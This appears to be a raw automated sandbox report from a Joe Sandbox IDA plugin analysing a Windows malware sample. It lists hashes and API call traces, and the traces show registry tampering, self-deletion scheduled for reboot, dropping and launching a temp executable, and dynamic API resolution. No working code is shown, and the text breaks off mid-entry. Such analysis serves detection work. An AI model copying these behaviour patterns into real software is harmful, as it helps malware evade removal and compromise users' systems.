                                                                  • Opcode ID: c0813e0e13b3bdf5361ae911ad3d7297fecab97c2126bead805d02d7372984c4
                                                                  • Instruction ID: 4ea2d180e8293730c515bf7f31d434ed5d52511cef3b66f0afd499666270cbed
                                                                  • Opcode Fuzzy Hash: c0813e0e13b3bdf5361ae911ad3d7297fecab97c2126bead805d02d7372984c4
                                                                  • Instruction Fuzzy Hash: 0452A72000CBC2C9D332D27C584879FBFD11BA7228F584B9DE1F95A2E2D7A68146C767
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A5,00000000,00000001,00000001,00000000,00000000,00000001,00000001), ref: 00414E44
                                                                  • CreateThread.KERNEL32(00000000,00000000,00401260,?,00000000,?), ref: 00414E6E
                                                                  • CreateThread.KERNEL32(00000000,00000000,004191C0,?,00000000,?), ref: 00414EF5
                                                                  • WaitForMultipleObjects.KERNEL32(0000000A,?,00000001,000000FF,?,00000001), ref: 00414F35
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Thread$EventMultipleObjectsWait
                                                                  • String ID: $$$$$%$&$&$&$($($($($($($)$)$*$*$*$*$*$+$+$,$,$-$-$-$.$/$1$5$6$7$8$9$>$@$@$A$C$D$E$E$H$L$S$V$X$Z$Z$[$\$c$g$k$l$p$q$v$v$w$z$}$}
                                                                  • API String ID: 235807246-2775756417
                                                                  • Opcode ID: a6afbd8884c598ed69450247ac07e46a6a6b8b414b765670315f290819311f0a
                                                                  • Instruction ID: b6b29a9a05f7405d77ba8641239e9328c4f6afcdac9f5fec8354e56a50ce38c0
                                                                  • Opcode Fuzzy Hash: a6afbd8884c598ed69450247ac07e46a6a6b8b414b765670315f290819311f0a
                                                                  • Instruction Fuzzy Hash: A522283110C7C18AE332C7689859BDFBFD45BA7318F484A9EE1E95B2D2C6B90109C767
                                                                  APIs
                                                                  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00413420
                                                                  • RegDeleteValueA.ADVAPI32(?,?), ref: 00413451
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041345C
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413472
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0041348A
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 0041357C
                                                                  • DeleteFileA.KERNEL32(?), ref: 0041358C
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004136BF
                                                                  • DeleteFileA.KERNEL32(?), ref: 004136C9
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004137F1
                                                                  • DeleteFileA.KERNEL32(?), ref: 004137FB
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0041380C
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000078,?,00000104), ref: 004138E6
                                                                  • DeleteFileA.KERNEL32(?), ref: 004138F0
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004139C6
                                                                  • DeleteFileA.KERNEL32(?), ref: 004139D0
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 00413AA6
                                                                  • DeleteFileA.KERNEL32(?), ref: 00413AB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$Delete$EnvironmentExpandStrings$Move$CloseModuleNameOpenValue
                                                                  • String ID: '$'$'$'$'$'$0$0$0$0$0$0$4$4$4$4$4$4$:$:$:$:$:$<$F$F$Y$Y$Y$Y$Y$^$e$h$m$m$r$s$t$t$t$x$x$x$x$x$z$z$z$z$z$z${${${${${${rest
                                                                  • API String ID: 3238871166-1982327307
                                                                  • Opcode ID: eb28d1edef8d5a0ebcf80e1393b2c75a925ba66498ea7eb4a4f4807419b03660
                                                                  • Instruction ID: 8932c8d423f86795222f4535f9e39ef289d62bf3872af0266dd33df7fd326858
                                                                  • Opcode Fuzzy Hash: eb28d1edef8d5a0ebcf80e1393b2c75a925ba66498ea7eb4a4f4807419b03660
                                                                  • Instruction Fuzzy Hash: 5042961110D7C2C9D332D67C984878FBFD51BA7228F484F8DE1E95B2E2C6A98249C767
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00422D24
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00422D2D
                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00422D38
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00422D3B
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?), ref: 00422D51
                                                                  • RegQueryValueExA.ADVAPI32(?,0000003B,00000000,00000000,00000000,?), ref: 00422D6E
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00422D7D
                                                                  • _strncpy.LIBCMT ref: 00422DD1
                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,?,00000000,00000002,?,00000054), ref: 00422E90
                                                                  • RegCloseKey.ADVAPI32(?,?,00000054), ref: 00422EA7
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000054), ref: 00422EB6
                                                                  • HeapFree.KERNEL32(00000000,?,00000054), ref: 00422EBF
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000054), ref: 00422EC4
                                                                  • HeapFree.KERNEL32(00000000,?,00000054), ref: 00422EC7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocCloseFreeValue$OpenQuery_strncpy
                                                                  • String ID: !$"$#$%$'$'$)$,$,$,$.$/$1$4$4$4$6$8$9$;$<$?$B$E$F$G$G$K$N$N$P$P$Q$Q$R$S$S$T$T$W$W$X$Z$\$]$b$c$c$e$g$t$u$v$x$x$x${$}$~
                                                                  • API String ID: 3932281191-2427493838
                                                                  • Opcode ID: 1e99909b19aa585da5ead2d891978beee004937c050dea2f45ef4ffdaa32fc77
                                                                  • Instruction ID: 4784c4b2e2af174b486d3fa0099c06b4624002471a15ad2e25fd25ecae521a18
                                                                  • Opcode Fuzzy Hash: 1e99909b19aa585da5ead2d891978beee004937c050dea2f45ef4ffdaa32fc77
                                                                  • Instruction Fuzzy Hash: 8002182120C7C19ED332C63C994879BBFD15BA7218F484A9DE1E85B3D2C7B98509C76B
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,000000FF), ref: 00422800
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00422807
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,74DF3310), ref: 00422821
                                                                  • RegQueryValueExA.ADVAPI32(?,00000054,00000000,00000000,00000000,?), ref: 0042283E
                                                                  • RegCloseKey.ADVAPI32(74DF3310), ref: 0042284D
                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,?,00000000,00000002,?,0000005C), ref: 004228DF
                                                                  • RegCloseKey.ADVAPI32(?,?,0000005C), ref: 004228F0
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,0000005C), ref: 004228F9
                                                                  • HeapFree.KERNEL32(00000000,?,0000005C), ref: 00422900
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseProcessValue$AllocFreeOpenQuery
                                                                  • String ID: !$"$%$&$'$($)$/$1$1$5$8$:$;$>$>$A$D$E$G$H$K$K$L$N$P$Q$R$R$S$S$S$T$Z$Z$\$]$b$b$d$d$f$g$j$j$m$p$q$s$v${${$~$~
                                                                  • API String ID: 1874932168-1336078793
                                                                  • Opcode ID: 437fdbd436a05d19afb7f5867172574a4622868046f25b3dfc0edf86c844fae6
                                                                  • Instruction ID: bbaaf71f1dd44b42d8da240f366e0f2ce8dd36e8536a405cef6b64a909e2b2a5
                                                                  • Opcode Fuzzy Hash: 437fdbd436a05d19afb7f5867172574a4622868046f25b3dfc0edf86c844fae6
                                                                  • Instruction Fuzzy Hash: FBF1D62110C7C18DD332C67C984879BBFD15BA7228F484A9DE1E84B3E3C7A98549C767
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004136BF
                                                                  • DeleteFileA.KERNEL32(?), ref: 004136C9
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004137F1
                                                                  • DeleteFileA.KERNEL32(?), ref: 004137FB
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0041380C
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000078,?,00000104), ref: 004138E6
                                                                  • DeleteFileA.KERNEL32(?), ref: 004138F0
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004139C6
                                                                  • DeleteFileA.KERNEL32(?), ref: 004139D0
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 00413AA6
                                                                  • DeleteFileA.KERNEL32(?), ref: 00413AB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$DeleteEnvironmentExpandStrings$Move
                                                                  • String ID: '$'$'$'$0$0$0$0$4$4$4$4$:$:$:$:$<$F$F$Y$Y$Y$Y$^$h$m$m$t$t$x$x$x$x$z$z$z$z${${${${
                                                                  • API String ID: 1654938343-3628898711
                                                                  • Opcode ID: e9b6a916e27b3cf29a9a65f7cf79a47c5e7352404d4b86a79d6f692a307431ad
                                                                  • Instruction ID: ffda26696a7c03ebfd7e55884b4f9ff3b6aa4abcfec39c9677275916e54d1851
                                                                  • Opcode Fuzzy Hash: e9b6a916e27b3cf29a9a65f7cf79a47c5e7352404d4b86a79d6f692a307431ad
                                                                  • Instruction Fuzzy Hash: 05D1A91100C7C289D322D67C945878FFFD51BE7228F484F9DE1E99A2D2C6AA824DC767
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00080000), ref: 00401BC5
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401BCC
                                                                  • Sleep.KERNEL32(000493E0), ref: 00401C28
                                                                  • Sleep.KERNEL32(000003E8), ref: 00401C4B
                                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 00401D10
                                                                  • GetTempFileNameA.KERNEL32(?,0042E290,00000000,?), ref: 00401D2D
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00401D5A
                                                                  • WriteFile.KERNEL32(00000000,00000007,?,?,00000000), ref: 00401D7B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00401D93
                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401DD0
                                                                  • CloseHandle.KERNEL32(?), ref: 00401DDF
                                                                  • CloseHandle.KERNEL32(?), ref: 00401DED
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00401E5C
                                                                  • HeapFree.KERNEL32(00000000), ref: 00401E63
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseFileHandleProcess$CreateSleepTemp$AllocFreeNamePathWrite
                                                                  • String ID: '$+$,$-$0$2$4$:$;$@$A$B$C$D$I$K$N$P$S$T$U$Y$\$^$c$e$p$r$v$y$z${$}
                                                                  • API String ID: 633426975-1940365277
                                                                  • Opcode ID: 69dfe3e2ad568bfae82bd1608e3d8c6f51c46d62c4de821528446c51c84c10da
                                                                  • Instruction ID: e6c0c0694c561dc4f23d5baa3025b2d471003fa36f15fb022360e7d662cf5cb9
                                                                  • Opcode Fuzzy Hash: 69dfe3e2ad568bfae82bd1608e3d8c6f51c46d62c4de821528446c51c84c10da
                                                                  • Instruction Fuzzy Hash: B7E16B3014C7C18EE321CB789848B9BBFD46BA6324F185A5DF2E48B2E2C7B58405D767
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,0000008A), ref: 0041DA87
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DB60
                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000001), ref: 0041DC17
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DCDE
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DDB9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: $$$$&$1$1$6$6$7$9$;$<$@$H$H$I$I$J$L$L$L$M$M$S$S$S$T$T$W$X$X$_$`$`$g$i$m$o$p$t$u$|$~
                                                                  • API String ID: 2238633743-2441341231
                                                                  • Opcode ID: e2dc3851afeb3bcb58ee0b1189764dea58b54e676dc674a3f0b7cb1962383261
                                                                  • Instruction ID: f0a6fbca38eaa9f6d36dd2073cba8300d351a760273fb7828a6aeea559b7586c
                                                                  • Opcode Fuzzy Hash: e2dc3851afeb3bcb58ee0b1189764dea58b54e676dc674a3f0b7cb1962383261
                                                                  • Instruction Fuzzy Hash: B9A1762010C7C1CDD332D27D984879FBFD11BA3368F484A9DA1E85A2D2D7AA8549C777
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: wsprintf
                                                                  • String ID: )$)$)$)$)$)$/$1$<$<$<$<$<$C$C$C$C$C$C$E$J$K$U$V$V$V$V$V$[$\$]$b$c$f$j$l$q$q$q$q$q$s$s$s$s$s$s$t$u$x$y$z${
                                                                  • API String ID: 2111968516-877203839
                                                                  • Opcode ID: 2b5871d10edba0c0daadef3549677835c7a0ea46b4b24e0847e491320e849e80
                                                                  • Instruction ID: b8cea7b21e1b0b0dd3eef741e46aff7ac42a2e861af7119df59345f413ed0d70
                                                                  • Opcode Fuzzy Hash: 2b5871d10edba0c0daadef3549677835c7a0ea46b4b24e0847e491320e849e80
                                                                  • Instruction Fuzzy Hash: 2BB1E810D0C7D999EB22C2FC94587DEBFB50F27318F580299D5E47B2D2C2AA0249C77A
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0041F51C
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041F523
                                                                  • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 0041F546
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000054), ref: 0041F5DA
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,00000014), ref: 0041F609
                                                                  • CloseHandle.KERNEL32(00000014), ref: 0041F628
                                                                  • CloseHandle.KERNEL32(00000022), ref: 0041F62F
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041F634
                                                                  • HeapFree.KERNEL32(00000000), ref: 0041F63B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$CloseCreateHandle$AllocDirectoryEventFreeSystem
                                                                  • String ID: $ $"$"$($)$)$*$*$.$0$8$;$D$D$D$D$E$E$L$N$N$P$S$S$T$T$V$Z$`$i$o$p$s$v$z
                                                                  • API String ID: 1999696495-2708113935
                                                                  • Opcode ID: 738ece0ca0369f4287c7408b09edaf122eaf261e57d7ddf3076aad516e63fadf
                                                                  • Instruction ID: 6417ec356ac032fdf8ba3c7335fdffbff661ba0545f4a4a4b03294bf4e60ec5a
                                                                  • Opcode Fuzzy Hash: 738ece0ca0369f4287c7408b09edaf122eaf261e57d7ddf3076aad516e63fadf
                                                                  • Instruction Fuzzy Hash: 40D1062110C7C19AD322CB3C984878FBFD15BA7618F584A9DF1E44B3E2C6A5854AC76B
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000001), ref: 00412EBA
                                                                  • RegQueryValueExA.ADVAPI32(000000F2,00000092,00000000,000000EC,?,?,00000000), ref: 00412F74
                                                                  • RegCloseKey.ADVAPI32(00000104), ref: 00412F88
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
